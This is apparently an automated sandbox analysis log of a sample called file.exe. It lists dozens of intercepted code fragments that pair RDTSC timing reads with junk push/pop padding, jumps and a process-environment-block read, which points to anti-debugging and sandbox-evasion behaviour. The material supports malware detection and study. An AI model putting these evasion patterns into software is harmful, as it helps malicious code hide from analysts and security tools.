      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990694 second address: 49906CD instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC7C5219A67h 0x00000008 mov ah, 54h 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d mov ecx, dword ptr [ebp+08h] 0x00000010 pushad 0x00000011 mov ebx, 6208D334h 0x00000016 mov edx, 04F9EEA0h 0x0000001b popad 0x0000001c mov eax, 00000000h 0x00000021 push eax 0x00000022 push edx 0x00000023 push eax 0x00000024 push edx 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49906CD second address: 49906D1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49906D1 second address: 49906D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 49906D7 second address: 499072F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov cl, 4Bh 0x00000005 pushad 0x00000006 popad 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a inc eax 0x0000000b jmp 00007FC7C474F647h 0x00000010 lock xadd dword ptr [ecx], eax 0x00000014 pushad 0x00000015 mov edi, eax 0x00000017 pushfd 0x00000018 jmp 00007FC7C474F640h 0x0000001d jmp 00007FC7C474F645h 0x00000022 popfd 0x00000023 popad 0x00000024 inc eax 0x00000025 push eax 0x00000026 push edx 0x00000027 push eax 0x00000028 push edx 0x00000029 push eax 0x0000002a push edx 0x0000002b rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 499072F second address: 4990733 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4990733 second address: 4990739 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00014 second address: 4A0001A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0001A second address: 4A0003D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F63Dh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007FC7C474F63Dh 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0003D second address: 4A00043 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00043 second address: 4A00047 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00047 second address: 4A0004B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0004B second address: 4A00094 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a pushfd 0x0000000b jmp 00007FC7C474F644h 0x00000010 xor ecx, 07E01128h 0x00000016 jmp 00007FC7C474F63Bh 0x0000001b popfd 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC7C474F646h 0x00000023 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00094 second address: 4A000D2 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 35DF6121h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a xchg eax, ebp 0x0000000b jmp 00007FC7C5219A5Ch 0x00000010 mov ebp, esp 0x00000012 pushad 0x00000013 pushfd 0x00000014 jmp 00007FC7C5219A5Eh 0x00000019 and cx, 25E8h 0x0000001e jmp 00007FC7C5219A5Bh 0x00000023 popfd 0x00000024 push eax 0x00000025 push edx 0x00000026 mov bl, ah 0x00000028 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A000D2 second address: 4A0010B instructions: 0x00000000 rdtsc 0x00000002 mov bh, 91h 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov eax, dword ptr fs:[00000030h] 0x0000000d jmp 00007FC7C474F63Ah 0x00000012 sub esp, 18h 0x00000015 jmp 00007FC7C474F640h 0x0000001a xchg eax, ebx 0x0000001b push eax 0x0000001c push edx 0x0000001d push eax 0x0000001e push edx 0x0000001f jmp 00007FC7C474F63Ah 0x00000024 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0010B second address: 4A0010F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0010F second address: 4A00115 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00115 second address: 4A0011B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0011B second address: 4A0011F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0011F second address: 4A00144 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00144 second address: 4A00160 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F648h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00160 second address: 4A001C5 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FC7C5219A61h 0x00000008 mov di, cx 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebx 0x0000000f pushad 0x00000010 pushfd 0x00000011 jmp 00007FC7C5219A5Fh 0x00000016 and ecx, 34B6BB5Eh 0x0000001c jmp 00007FC7C5219A69h 0x00000021 popfd 0x00000022 popad 0x00000023 mov ebx, dword ptr [eax+10h] 0x00000026 jmp 00007FC7C5219A5Eh 0x0000002b xchg eax, esi 0x0000002c push eax 0x0000002d push edx 0x0000002e push eax 0x0000002f push edx 0x00000030 push eax 0x00000031 push edx 0x00000032 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A001C5 second address: 4A001C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A001C9 second address: 4A001E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A001E6 second address: 4A001EC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A001EC second address: 4A001F0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A001F0 second address: 4A001F4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A001F4 second address: 4A00214 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FC7C5219A65h 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00214 second address: 4A0021A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0021A second address: 4A0021E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0021E second address: 4A00222 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00222 second address: 4A00245 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 xchg eax, esi 0x00000009 pushad 0x0000000a jmp 00007FC7C5219A65h 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00245 second address: 4A00284 instructions: 0x00000000 rdtsc 0x00000002 mov bx, ax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 popad 0x00000008 mov esi, dword ptr [74E806ECh] 0x0000000e jmp 00007FC7C474F646h 0x00000013 test esi, esi 0x00000015 push eax 0x00000016 push edx 0x00000017 jmp 00007FC7C474F647h 0x0000001c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00284 second address: 4A0029C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C5219A64h 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0029C second address: 4A002CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F63Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jne 00007FC7C47504FEh 0x00000011 jmp 00007FC7C474F646h 0x00000016 xchg eax, edi 0x00000017 push eax 0x00000018 push edx 0x00000019 pushad 0x0000001a push eax 0x0000001b push edx 0x0000001c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A002CF second address: 4A002D9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov edx, 0A88265Eh 0x00000009 popad 0x0000000a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A002D9 second address: 4A00304 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F644h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b mov dh, 1Dh 0x0000000d mov eax, 0A105279h 0x00000012 popad 0x00000013 xchg eax, edi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 pushad 0x00000018 popad 0x00000019 push ebx 0x0000001a pop ecx 0x0000001b popad 0x0000001c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00304 second address: 4A00351 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A68h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 call dword ptr [74E50B60h] 0x0000000f mov eax, 750BE5E0h 0x00000014 ret 0x00000015 jmp 00007FC7C5219A60h 0x0000001a push 00000044h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007FC7C5219A67h 0x00000023 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00351 second address: 4A003C8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F649h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edi 0x0000000a jmp 00007FC7C474F63Eh 0x0000000f xchg eax, edi 0x00000010 pushad 0x00000011 call 00007FC7C474F63Eh 0x00000016 mov cx, 2331h 0x0000001a pop esi 0x0000001b call 00007FC7C474F647h 0x00000020 jmp 00007FC7C474F648h 0x00000025 pop esi 0x00000026 popad 0x00000027 push eax 0x00000028 pushad 0x00000029 pushad 0x0000002a push eax 0x0000002b push edx 0x0000002c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A003C8 second address: 4A003E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 mov ebx, ecx 0x00000006 popad 0x00000007 mov ecx, 142B1A75h 0x0000000c popad 0x0000000d xchg eax, edi 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FC7C5219A5Ah 0x00000017 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A003E4 second address: 4A003EA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A003EA second address: 4A003F0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A003F0 second address: 4A003F4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0049B second address: 4A004A1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A004A1 second address: 4A004B1 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 test esi, esi 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A004B1 second address: 4A004B5 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A004B5 second address: 4A004BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A004BB second address: 4A004F4 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A66h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 je 00007FC835618C29h 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FC7C5219A67h 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A004F4 second address: 4A004FA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A004FA second address: 4A00527 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A5Bh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b sub eax, eax 0x0000000d jmp 00007FC7C5219A5Fh 0x00000012 mov dword ptr [esi], edi 0x00000014 push eax 0x00000015 push edx 0x00000016 pushad 0x00000017 mov ax, di 0x0000001a pushad 0x0000001b popad 0x0000001c popad 0x0000001d rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00527 second address: 4A0053E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C474F63Ah 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov dword ptr [esi+04h], eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0053E second address: 4A0055B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A69h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0055B second address: 4A00571 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov di, BA22h 0x00000007 pushad 0x00000008 popad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c mov dword ptr [esi+08h], eax 0x0000000f pushad 0x00000010 mov esi, edi 0x00000012 push eax 0x00000013 push edx 0x00000014 pushad 0x00000015 popad 0x00000016 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00571 second address: 4A005EE instructions: 0x00000000 rdtsc 0x00000002 call 00007FC7C5219A5Dh 0x00000007 pop ecx 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b mov dword ptr [esi+0Ch], eax 0x0000000e jmp 00007FC7C5219A67h 0x00000013 mov eax, dword ptr [ebx+4Ch] 0x00000016 pushad 0x00000017 movzx eax, bx 0x0000001a pushfd 0x0000001b jmp 00007FC7C5219A61h 0x00000020 sub cx, 2806h 0x00000025 jmp 00007FC7C5219A61h 0x0000002a popfd 0x0000002b popad 0x0000002c mov dword ptr [esi+10h], eax 0x0000002f push eax 0x00000030 push edx 0x00000031 push eax 0x00000032 push edx 0x00000033 jmp 00007FC7C5219A68h 0x00000038 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A005EE second address: 4A005F2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A005F2 second address: 4A005F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A005F8 second address: 4A00609 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FC7C474F63Dh 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00609 second address: 4A0060D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0060D second address: 4A0061E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+50h] 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0061E second address: 4A00634 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FC7C5219A62h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00634 second address: 4A0063A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0063A second address: 4A0063E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0063E second address: 4A0064F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+14h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0064F second address: 4A00653 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00653 second address: 4A00659 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00659 second address: 4A00678 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 mov dx, F6AEh 0x00000007 mov di, CFBAh 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [ebx+54h] 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FC7C5219A5Ch 0x00000018 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00678 second address: 4A0067E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0067E second address: 4A0068F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esi+18h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0068F second address: 4A00693 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00693 second address: 4A00697 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00697 second address: 4A0069D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0069D second address: 4A006A3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A006A3 second address: 4A006A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A006A7 second address: 4A006AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A006AB second address: 4A006C6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov eax, dword ptr [ebx+58h] 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FC7C474F63Eh 0x00000012 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A006C6 second address: 4A0072C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC7C5219A61h 0x00000009 or si, D6F6h 0x0000000e jmp 00007FC7C5219A61h 0x00000013 popfd 0x00000014 push ecx 0x00000015 pop ebx 0x00000016 popad 0x00000017 pop edx 0x00000018 pop eax 0x00000019 mov dword ptr [esi+1Ch], eax 0x0000001c pushad 0x0000001d movzx eax, bx 0x00000020 mov dl, B8h 0x00000022 popad 0x00000023 mov eax, dword ptr [ebx+5Ch] 0x00000026 jmp 00007FC7C5219A5Ch 0x0000002b mov dword ptr [esi+20h], eax 0x0000002e jmp 00007FC7C5219A60h 0x00000033 mov eax, dword ptr [ebx+60h] 0x00000036 push eax 0x00000037 push edx 0x00000038 push eax 0x00000039 push edx 0x0000003a pushad 0x0000003b popad 0x0000003c rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0072C second address: 4A00730 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00730 second address: 4A00736 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00736 second address: 4A0076D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC7C474F642h 0x00000009 jmp 00007FC7C474F645h 0x0000000e popfd 0x0000000f mov dh, al 0x00000011 popad 0x00000012 pop edx 0x00000013 pop eax 0x00000014 mov dword ptr [esi+24h], eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A0076D second address: 4A007F4 instructions: 0x00000000 rdtsc 0x00000002 mov esi, 516D5311h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov esi, 3B430F4Dh 0x0000000e popad 0x0000000f mov eax, dword ptr [ebx+64h] 0x00000012 jmp 00007FC7C5219A68h 0x00000017 mov dword ptr [esi+28h], eax 0x0000001a pushad 0x0000001b call 00007FC7C5219A5Eh 0x00000020 pushad 0x00000021 popad 0x00000022 pop eax 0x00000023 call 00007FC7C5219A61h 0x00000028 jmp 00007FC7C5219A60h 0x0000002d pop ecx 0x0000002e popad 0x0000002f mov eax, dword ptr [ebx+68h] 0x00000032 push eax 0x00000033 push edx 0x00000034 pushad 0x00000035 pushfd 0x00000036 jmp 00007FC7C5219A5Ah 0x0000003b add ah, 00000058h 0x0000003e jmp 00007FC7C5219A5Bh 0x00000043 popfd 0x00000044 mov ax, 1F0Fh 0x00000048 popad 0x00000049 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A007F4 second address: 4A00894 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007FC7C474F63Bh 0x00000009 sbb ecx, 69C40D1Eh 0x0000000f jmp 00007FC7C474F649h 0x00000014 popfd 0x00000015 call 00007FC7C474F640h 0x0000001a pop esi 0x0000001b popad 0x0000001c pop edx 0x0000001d pop eax 0x0000001e mov dword ptr [esi+2Ch], eax 0x00000021 pushad 0x00000022 jmp 00007FC7C474F647h 0x00000027 movzx ecx, bx 0x0000002a popad 0x0000002b mov ax, word ptr [ebx+6Ch] 0x0000002f jmp 00007FC7C474F63Bh 0x00000034 mov word ptr [esi+30h], ax 0x00000038 jmp 00007FC7C474F646h 0x0000003d mov ax, word ptr [ebx+00000088h] 0x00000044 push eax 0x00000045 push edx 0x00000046 pushad 0x00000047 mov edi, 34FEC1F0h 0x0000004c mov ebx, 69260D1Ch 0x00000051 popad 0x00000052 rdtsc
      Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: 4A00894 second address: 4A008B8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push esi 0x00000004 pop edi 0x00000005 mov bl, ah 0x00000007 popad 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov word ptr [esi+32h], ax 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 jmp 00007FC7C5219A60h 0x00000016 mov dh, cl 0x00000018 popad 0x00000019 rdtsc
